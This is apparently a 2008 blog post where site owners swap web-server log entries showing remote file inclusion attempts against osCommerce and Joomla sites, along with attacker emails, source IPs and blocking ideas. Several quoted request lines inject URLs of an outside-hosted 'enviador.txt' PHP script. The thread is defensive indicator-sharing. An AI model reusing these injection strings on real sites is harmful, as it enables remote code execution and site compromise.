Another hacker trying to inject a php script located at.
http://www.1004smile.com/data/enviador.txt
[05-31-2008-15:49:12]
advanced_search_result.php?categories_id=http://www.1004smile.com/data/enviador.txt?&servidor=www._____.com/advanced_search_result.php?categories_id=¶=brancohat@gmail.com GET HTTP/1.1
Agent: -NO AGENT-
81.171.34.37 kopkaas.com
This has something to do with the OSCOMMERCE search routine.
Subscribe to:
Post Comments (Atom)
10 comments:
also
http://www.neobundao.com/enviador.txt?&servidor=
and
http://www.darkhand.net/Bots/enviador.txt?&
Another one http://www.opengear.at/rotator/enviador.txt
hacker also using email kbtcone@yahoo.com and enviador.txt file to attack oscommerce sites
who the hell they are ... trying same on 4 of my websites... URL:[/index.php?p=http://premmy.myftp.biz:8080/enviador.txt?&servidor=www.talentcapital.ae/index.php?p=¶=premmy35@gmail.com][/index.php?p=http://www.fpe.sn/webcam/enviador.txt?&servidor=www.talentcapital.ae/index.php?p=¶=premmy35@gmail.com] From IP:{173.201.253.28, 194.24.252.101, 200.58.112.125, 200.80.36.148, 202.67.226.122, 208.109.186.113, 208.109.98.121, 218.189.139.238, 41.208.148.72, 62.156.178.189, 69.175.85.82, 72.167.48.2} I think we must block these IP
Not just OSCommerce websites are affected. Joomla sites are also vulnerable to this attack, usually with the e-mailaddress premmy35@gmail.com
I detect this kind of attack on my websites on an almost daily basis. What can be done for this to be stopped permanently?
[BVS]
@Abhishek Sachan - blocking the IP addresses was also something that came into my mind but I'm afraid it won't do any good as the attacker(s) use another IP every time. I have detected attempts originating from Taiwanese, Russian, Polish, Iranian and German addresses.
[BVS]
yeah you are right.. blocking IP is something difficult for them but i have something new in my mind not implemented yet... we can detect their user_agents they are generally of type bots.. there are databases present online which can tell u about the useragents we can block them by scripts but this method can also fail bcoz its easy to change user agent...
If you install M&M Autoban you can ban the action they are taking it will then take care of banning the IPS it detects doing this.
Add the URSLS and email addresses to the hackers file, In most cases they are already in it. Look for a new version soon as the next upgrade will let you ban countries you do not want on your site.
I also detect in my web server logs a similar attack but using "sexycabrito@gmail.com" instead of "premy35@gmail.com", can someone give me please more explanation about the mechanisme of this attack
best regards
hello
i have the same logs appear in my web server but using "sexycabrito@gmail.com" instead of "premy35@gmail.com" can anybody gves me more explanation about these attacks
thanxs
best regards
Post a Comment